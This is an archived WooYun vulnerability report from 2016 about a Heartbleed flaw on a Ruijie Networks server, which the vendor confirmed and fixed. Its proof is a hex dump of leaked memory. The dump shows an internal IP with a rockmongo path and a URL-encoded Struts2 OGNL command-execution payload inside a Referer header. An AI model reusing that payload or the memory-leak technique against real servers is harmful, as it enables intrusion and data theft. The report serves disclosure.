漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0179877
漏洞标题:锐捷网络某服务器存在心脏滴血
相关厂商:ruijie.com.cn
漏洞作者: 路人甲
提交时间:2016-03-01 17:51
修复时间:2016-03-04 09:58
公开时间:2016-03-04 09:58
漏洞类型:系统/服务补丁不及时
危害等级:高
自评Rank:10
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-03-01: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-04: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
锐捷某站点运维不当导致服务器敏感信息泄露,存在心脏滴血
详细说明:
漏洞证明:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 63 6E 00 0B ....#.......cn..
00e0: 00 04 03 00 01 02 00 0A 00 3A 00 38 00 0E 00 0D .........:.8....
00f0: 00 19 00 1C 00 0B 00 0C 00 1B 00 18 00 09 00 0A ................
0100: 00 1A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 ................
0110: 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F ................
0120: 00 10 00 11 00 23 00 00 00 0D 00 20 00 1E 06 01 .....#..... ....
0130: 06 02 06 03 05 01 05 02 05 03 04 01 04 02 04 03 ................
0140: 03 01 03 02 03 03 02 01 02 02 02 03 00 0F 00 01 ................
0150: 01 00 15 00 AB 00 00 00 00 00 00 00 00 00 00 00 ................
0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0200: 71 6C 69 6E 6A 65 63 74 0D 0A 43 6F 6E 6E 65 63 qlinject..Connec
0210: 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 52 65 66 tion: close..Ref
0220: 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F 31 31 erer: https://11
0230: 37 2E 37 39 2E 31 35 37 2E 31 34 37 3A 34 34 33 7.79.157.147:443
0240: 2F 77 65 62 2F 72 6F 63 6B 6D 6F 6E 67 6F 2F 69 /web/rockmongo/i
0250: 6E 64 65 78 2E 70 68 70 0D 0A 0D 0A A4 2D C4 EB ndex.php.....-..
0260: 77 CC 5A 42 EA 96 28 17 A8 DA B0 8E 28 54 D4 C6 w.ZB..(.....(T..
0270: 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F ................
0280: 93 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................
0290: 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F 0F ................
02a0: 19 11 BD 52 77 28 CB 3A 60 EC 31 2C A4 2E 77 F9 ...Rw(.:`.1,..w.
02b0: FF 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................
02c0: 78 24 34 3A 45 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A 0A x$4:E...........
02d0: 2E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................
02e0: 36 76 36 39 65 64 33 68 75 30 67 33 0D 0A 52 65 6v69ed3hu0g3..Re
02f0: 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F 73 ferer: https://s
0300: 61 66 65 75 70 2E 72 75 69 6A 69 65 2E 63 6F 6D afeup.ruijie.com
0310: 2E 63 6E 3F 72 65 64 69 72 65 63 74 3A 24 25 37 .cn?redirect:$%7
0320: 42 25 32 33 61 25 33 64 28 6E 65 77 25 32 30 6A B%23a%3d(new%20j
0330: 61 76 61 2E 6C 61 6E 67 2E 50 72 6F 63 65 73 73 ava.lang.Process
0340: 42 75 69 6C 64 65 72 28 6E 65 77 25 32 30 6A 61 Builder(new%20ja
0350: 76 61 2E 6C 61 6E 67 2E 53 74 72 69 6E 67 25 35 va.lang.String%5
0360: 42 25 35 44 25 32 30 25 37 42 27 65 63 68 6F 27 B%5D%20%7B'echo'
0370: 2C 27 61 61 61 61 61 61 61 61 61 61 27 25 37 44 ,'aaaaaaaaaa'%7D
0380: 29 29 2E 73 74 61 72 74 28 29 2C 25 32 33 62 25 )).start(),%23b%
0390: 33 64 25 32 33 61 2E 67 65 74 49 6E 70 75 74 53 3d%23a.getInputS
03a0: 74 72 65 61 6D 28 29 2C 25 32 33 63 25 33 64 6E tream(),%23c%3dn
03b0: 65 77 25 32 30 6A 61 76 61 2E 69 6F 2E 49 6E 70 ew%20java.io.Inp
03c0: 75 74 53 74 72 65 61 6D 52 65 61 64 65 72 25 32 utStreamReader%2
03d0: 30 28 25 32 33 62 29 2C 25 32 33 64 25 33 64 6E 0(%23b),%23d%3dn
03e0: 65 77 25 32 30 6A 61 76 61 2E 69 6F 2E 42 75 66 ew%20java.io.Buf
03f0: 66 65 72 65 64 52 65 61 64 65 72 28 25 32 33 63 feredReader(%23c
0400: 29 2C 25 32 33 65 25 33 64 6E 65 77 25 32 30 63 ),%23e%3dnew%20c
0410: 68 61 72 25 35 42 31 30 25 35 44 2C 25 32 33 64 har%5B10%5D,%23d
0420: 2E 72 65 61 64 28 25 32 33 65 29 2C 25 32 33 6D .read(%23e),%23m
0430: 61 74 74 25 33 64 25 32 30 25 32 33 63 6F 6E 74 att%3d%20%23cont
0440: 65 78 74 2E 67 65 74 28 27 63 6F 6D 2E 6F 70 65 ext.get('com.ope
0450: 6E 73 79 6D 70 68 6F 6E 79 2E 78 77 6F 72 6B 32 nsymphony.xwork2
0460: 2E 64 69 73 70 61 74 63 68 65 72 2E 48 74 74 70 .dispatcher.Http
0470: 53 65 72 76 6C 65 74 52 65 73 70 6F 6E 73 65 27 ServletResponse'
0480: 29 2C 25 32 33 6D 61 74 74 2E 67 65 74 57 72 69 ),%23matt.getWri
0490: 74 65 72 28 29 2E 70 72 69 6E 74 6C 6E 25 32 30 ter().println%20
04a0: 28 25 32 33 65 29 2C 25 32 33 6D 61 74 74 2E 67 (%23e),%23matt.g
04b0: 65 74 57 72 69 74 65 72 28 29 2E 66 6C 75 73 68 etWriter().flush
04c0: 28 29 2C 25 32 33 6D 61 74 74 2E 67 65 74 57 72 (),%23matt.getWr
04d0: 69 74 65 72 28 29 2E 63 6C 6F 73 65 28 29 25 37 iter().close()%7
04e0: 44 0D 0A 0D 0A E7 28 1F 1F 5F 5F 2E 00 62 66 C9 D.....(..__..bf.
04f0: 4A 68 36 1B AB 33 62 25 32 39 25 32 43 25 32 33 Jh6..3b%29%2C%23
0500: 64 25 33 44 6E 65 77 25 32 30 6A 61 76 61 2E 69 d%3Dnew%20java.i
0510: 6F 2E 42 75 66 66 65 72 65 64 52 65 61 64 65 72 o.BufferedReader
0520: 25 32 38 25 32 33 63 25 32 39 25 32 43 25 32 33 %28%23c%29%2C%23
0530: 65 25 33 44 6E 65 77 25 32 30 63 68 61 72 25 35 e%3Dnew%20char%5
0540: 42 39 25 35 44 25 32 43 25 32 33 64 2E 72 65 61 B9%5D%2C%23d.rea
0550: 64 25 32 38 25 32 33 65 25 32 39 25 32 43 25 32 d%28%23e%29%2C%2
0560: 33 72 65 73 2E 67 65 74 57 72 69 74 65 72 25 32 3res.getWriter%2
0570: 38 25 32 39 2E 70 72 69 6E 74 6C 6E 25 32 38 25 8%29.println%28%
0580: 32 33 65 25 32 39 25 32 43 25 32 33 72 65 73 2E 23e%29%2C%23res.
0590: 67 65 74 57 72 69 74 65 72 25 32 38 25 32 39 2E getWriter%28%29.
05a0: 66 6C 75 73 68 25 32 38 25 32 39 25 32 43 25 32 flush%28%29%2C%2
05b0: 33 72 65 73 2E 67 65 74 57 72 69 74 65 72 25 32 3res.getWriter%2
05c0: 38 25 32 39 2E 63 6C 6F 73 65 25 32 38 25 32 39 8%29.close%28%29
05d0: 25 37 44 0D 0A 0D 0A 34 00 AF 7A 82 8F 39 A0 73 %7D....4..z..9.s
05e0: FE C9 D2 BE ED 8C C3 00 00 00 00 00 00 00 00 00 ................
修复方案:
补丁早该打了
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2016-03-04 09:57
厂商回复:
已修复
最新状态:
2016-03-04:已修复